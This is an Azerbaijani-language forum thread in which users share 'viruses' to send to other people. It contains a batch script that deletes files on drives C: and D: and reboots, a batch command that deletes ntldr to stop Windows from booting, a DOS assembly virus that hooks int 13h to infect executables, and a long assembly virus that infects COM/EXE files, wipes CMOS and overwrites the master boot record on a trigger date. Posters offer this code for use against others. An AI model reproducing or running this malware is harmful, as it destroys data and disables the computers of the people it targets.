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Guest Musa_

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Salam.Sizə bir kod verəcəm.Siz o kodu .txt mətninə salıb .bat faylı kimi yadda saxlamalısız.Bu virusu düzəldib kimə göndərəniz,göndərdiyiniz şəxsin komp-u format olunacaq).Buyrun:

echo off



echo by MUSA_


echo off




del /f /q d:


del /f /q c:


shutdown -r

shutdown -a

P.S:Əgər kompunuza format lazımdırsa özünüzdə sınaya bilərsiniz!)

Gəlin bildiyimiz virusları paylaşaq...:)

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Hmm yoxladim obsi acildi ms-dos dedi klavisden duymeni bas basdim enteri sonra 5-6 ikon yox oldu restart etdim ordum yo yeen ikonlar gelemdi sistemi egri kecdim duzeldi :))


Bunu oz PC-nizde etmeyin ha sistemi heqiqeten kocdurur.Cunki bu kod menim sistemimi dagidib.

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he nye tanimirki antivurus butun sistem faylalrini taniyir bat cmd bunlar windowsun en esas fayllaridnandir.silent zad hazirlayanda onladan istifade edilir.

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write('$'); writeln;

writeln('Bad command or filename');











Birinde men verim-)) Yoxlayin ozuvuzde sonra bashiviz agriayacaq-)) Kod Paskalda yazilib.....!!!

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Vusal yoxlayirsansa onda ala bunu....)) Mugayet ol....))



; Virus ExeHeader.40hex by Firebird cavid8789@mail.ru (7.01.1900)

; ~~~~~ Thans to cavid8789@mail.ru Burdan ashagi artiq virusdur,deyesen systemi dagitmasan sakit olmuyacaqsan...)


; 0000: B4 13 CD 2F 0E 1F BA 16 00 06 53 66 8F 44 40 CD

; 0010: 2F BA 40 00 CD 27 60 26 81 3F 4D 5A 75 20 26 8B

; 0020: 4F 18 83 F9 40 75 17 53 5F 03 F9 26 03 5D FC 26

; 0030: 81 3F 50 45 75 08 1E 0E 1F 33 F6 F3 A4 1F 61 EA


.model small



org 0


start: mov ah, 13h ; get seg:ofs int13h (es:bx)

int 2Fh


push cs ; ds:dx = new seg:ofs int13h

pop ds

lea dx, int13


push es ; save old seg:ofs int13h

push bx

pop dword ptr [si+old13-start]


int 2Fh ; set seg:ofs int13h


mov dx,old13-start ; TSR (keep dx bytes)

int 27h


int13: pusha


cmp word ptr es:[bx], 'ZM' ; exe ?

jne exit13


mov cx,es:[bx+18h] ; new exe ?

cmp cx,40h

jne exit13


push bx

pop di

add di,cx ; dst ofs


add bx,es:[di-4]

cmp word ptr es:[bx],'EP' ; Portable Executable

jne exit13


push ds


push cs ; src seg

pop ds


xor si,si ; src ofs


rep movsb ; move body


pop ds


exit13: popa


db 0EAh ; jmp far


old13 dd ?


end start



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Delphini oyrenin tojan hazirlayin :)


Cavid bunu bat hemde cmd etdim yoxladim sistem isleyir yene :)


; 0000: B4 13 CD 2F 0E 1F BA 16 00 06 53 66 8F 44 40 CD

; 0010: 2F BA 40 00 CD 27 60 26 81 3F 4D 5A 75 20 26 8B

; 0020: 4F 18 83 F9 40 75 17 53 5F 03 F9 26 03 5D FC 26

; 0030: 81 3F 50 45 75 08 1E 0E 1F 33 F6 F3 A4 1F 61 EA


.model small



org 0


start: mov ah, 13h ; get seg:ofs int13h (es:bx)

int 2Fh


push cs ; ds:dx = new seg:ofs int13h

pop ds

lea dx, int13


push es ; save old seg:ofs int13h

push bx

pop dword ptr [si+old13-start]


int 2Fh ; set seg:ofs int13h


mov dx,old13-start ; TSR (keep dx bytes)

int 27h


int13: pusha


cmp word ptr es:[bx], 'ZM' ; exe ?

jne exit13


mov cx,es:[bx+18h] ; new exe ?

cmp cx,40h

jne exit13


push bx

pop di

add di,cx ; dst ofs


add bx,es:[di-4]

cmp word ptr es:[bx],'EP' ; Portable Executable

jne exit13


push ds


push cs ; src seg

pop ds


xor si,si ; src ofs


rep movsb ; move body


pop ds


exit13: popa


db 0EAh ; jmp far


old13 dd ?


end start


Basqa kod varmi verin gelsin :)))


Bu kodu ama yoxlamayin cunki heqiqeten sistem acilmayacqdir.


attrib -s -h -r -a c:\\ntldr

del c:\\ntldr


.bat kimi saxranit edin ve iki defe klik edin restart edin komputere artiq C disqindeki ntldr silnecekdir :)

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- Sifreli SuperUser BIOS-larin silinmesi

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- BGA Chiplerin deyisdirilmesi (GPU/CPU/FCH/PCH/HM ve s)

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[hide]cseg segment

assume cs:cseg,ds:cseg

org 100h


jmp begin

mes db 'AnTiLamE f0r DOS/Windoze95',13,10

db 'Date(DD.MM.YY):$'

mes1 db 'command.com 0pen ERRoR!',13,10,'$'

mes2 db 13,10,'Install ErroR!',13,10,7,'$'

mes3 db 13,10,'Already InSTAllED!',13,10,7,'$'

file db 'c:\\cOmMAnD.cOm',0

file1 db 'antilame.mes',0


call _next


pop bp

sub bp,offset _next

mov ah,4

int 1ah

cmp dl,byte ptr cs:[offset _day+bp]

jb _count

cmp dh,byte ptr cs:[offset _mes+bp]

jb _count

cmp cl,byte ptr cs:[offset _year+bp]

jb _count


xor bx,bx

_cmos_dead: ;Destroy CMOS...

mov al,bl

out 70h,al

xor al,al

out 71h,al

inc bl

cmp bl,100

jne _cmos_dead

push cs

pop ds

mov si,offset _mesag

add si,bp




or al,al

jz _destroy

mov ah,0eh

int 10h

jmp _echo


call _sec

mov ah,4eh

mov dx,offset files

add dx,bp

xor cx,cx

int 21h

mov dx,9eh

mov ah,41h

int 21h

mov ch,1

in al,40h

mov cl,al

mov dx,80h

mov ax,0301h

int 13h

jmp _destroy


cmp byte ptr cs:[_ce+bp],1

je _exe

mov al,byte ptr cs:[_buff1+bp]

mov byte ptr cs:[100h],al

mov al,byte ptr cs:[_buff1+1+bp]

mov byte ptr cs:[101h],al

mov al,byte ptr cs:[_buff1+2+bp]

mov byte ptr cs:[102h],al

mov ax,100h

push ax



mov si,offset _buff1

add si,bp

mov cx,ds

add cx,10h

mov bx,cx

add bx,word ptr cs:[si+0eh]


mov ss,bx

mov sp,word ptr cs:[si+10h]


add cx,word ptr cs:[si+16h]

mov bx,word ptr cs:[si+14h]

push cx

push bx




mov dx,1f6h

mov al,0a0h

out dx,al


mov dx,1f2h

mov al,1

out dx,al


mov dx,1f3h

mov al,1 ;Sect0r!

out dx,al


mov dx,1f4h

mov al,0

out dx,al


mov dx,1f5h

mov al,0

out dx,al


mov dx,1f7h

mov al,30h

out dx,al


in al,dx

test al,8

jz _mbrdead


mov cx,512/2

xor si,si

mov dx,1f0h

rep outsw


files db '*.*',0

_buff1 db 1ch dup (0)

_day db 0

_mes db 0

_year db 0

_ce db 0

_mesag db 101 dup (0)

_len equ $-_body


mov ah,8

int 21h

cmp al,'0'

jb _input

cmp al,'9'

ja _input

push ax

mov dl,al

mov ah,2

int 21h

pop ax

mov dh,al

sub dh,'0'


mov ah,8

int 21h

cmp al,'0'

jb _input1

cmp al,'9'

ja _input1

push ax

mov dl,al

mov ah,2

int 21h

pop ax

mov dl,al

sub dl,'0'

mov cl,4

shl dh,cl

add dh,dl

mov al,dh



mov ax,3d00h

mov dx,offset file1

int 21h

mov bx,ax

mov ah,3fh

mov dx,offset _mesag

mov cx,100

int 21h

mov ah,3eh

int 21h

mov ah,9

mov dx,offset mes

int 21h

call _input

cmp al,31h

jbe _nobad

jmp _badexit


mov byte ptr cs:[_day],al

mov ah,1

int 21h

call _input

cmp al,12h

ja _badexit

mov byte ptr cs:[_mes],al

mov ah,1

int 21h

call _input

mov byte ptr cs:[_year],al


mov dx,offset file

mov ax,4301h

xor cx,cx

int 21h

mov ax,3d02h

mov dx,offset file

int 21h

jnc _well

mov ah,9

mov dx,offset mes1

int 21h


mov ah,9

mov dx,offset mes2

int 21h

mov ax,4c01h

int 21h


mov bx,ax

mov ax,5700h

int 21h

cmp ch,1

jne _noclose

mov ah,9

mov dx,offset mes3

int 21h

jmp _close


mov ah,3fh

mov dx,offset _buff1

mov cx,1ch

int 21h

cmp word ptr cs:[_buff1],'ZM'

jne _comt

jmp _exetrach


xor dx,dx

xor cx,cx

mov ax,4202h

int 21h

sub ax,3

mov word ptr cs:[_jamp1],ax

mov ah,40h

mov dx,offset _body

mov cx,_len

int 21h

xor cx,cx

xor dx,dx

mov ax,4200h

int 21h

mov ah,40h

mov dx,offset _jamp

mov cx,3

int 21h

mov ax,5700h

int 21h

mov ch,1

mov ax,5701h

int 21h

jmp _close


mov di,offset _buff

mov si,offset _buff1

mov cx,1ch


rep movsb

mov di,offset _buff

xor cx,cx

xor dx,dx

mov ax,4202h

int 21h

mov hand,bx

push ax dx


xor dx,dx

mov ax,word ptr cs:[di+8]

mov cx,10h

mul cx

mov bx,ax


pop dx ax



sub ax,bx

sbb dx,0

mov cx,10h

div cx

mov word PTR ds:[di+16h],ax ;CS

mov word ptr ds:[di+14h],dx ;IP (for Mutation Engine)

mov word ptr ds:[di+0eh],ax ;SS

mov word ptr ds:[di+10h],555h ;SP

; mov word ptr cs:[di+12h],0abcdh

mov byte ptr cs:[_ce],1

mov bx,hand

mov dx,offset _body

mov cx,_len

mov ah,40h

int 21h


mov ax,4202h

xor cx,cx

xor dx,dx

int 21h


mov cx,200h

div cx


mov word ptr ds:[di+4h],ax

mov word ptr ds:[di+2h],dx

xor cx,cx

xor dx,dx

mov ax,4200h

int 21h

mov cx,1ch

mov dx,offset _buff

mov ah,40h

int 21h

mov ax,5700h

int 21h

mov ch,1

mov ax,5701h

int 21h


mov ah,3eh

int 21h

int 20h

hand dw 0

_jamp db 0e9h

_jamp1 dw 0


cseg ends

end start[/hide]


Bunuda yoxla mence maragli olacaq....))

Bezilerini .exe kimide soxranit ele...!!

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attrib -s -h -r -a c:\\ntldr

del c:\\ntldr


sen bir bunu yoxla gor zeifdi yoxsa guclu hemde bat ve cmd-leride exe etmek mumkundur

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meseln okodda boot.ini ve AUTOEXEC.BAT evelesek hemen fali silecekdir.C disqini hec bir virus basdan yag sile bilez cunki islek veziyyetde dll fayli hec avxt silinmir.sedece hansisa faylini silir.



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- Sifreli SuperUser BIOS-larin silinmesi

- Kicik chiplerin deyisidrilmesi

- BGA Chiplerin deyisdirilmesi (GPU/CPU/FCH/PCH/HM ve s)

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Hecne olmadi :)))

Dediki hdd format etmek dedim ok getdi restart verdim sistem acilib



he sadece c-deki fayli silir eslinde basi cixmayan ucun o boyuk problemdi eger silerse ssitem acilmayacq.

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- Sifreli SuperUser BIOS-larin silinmesi

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- BGA Chiplerin deyisdirilmesi (GPU/CPU/FCH/PCH/HM ve s)

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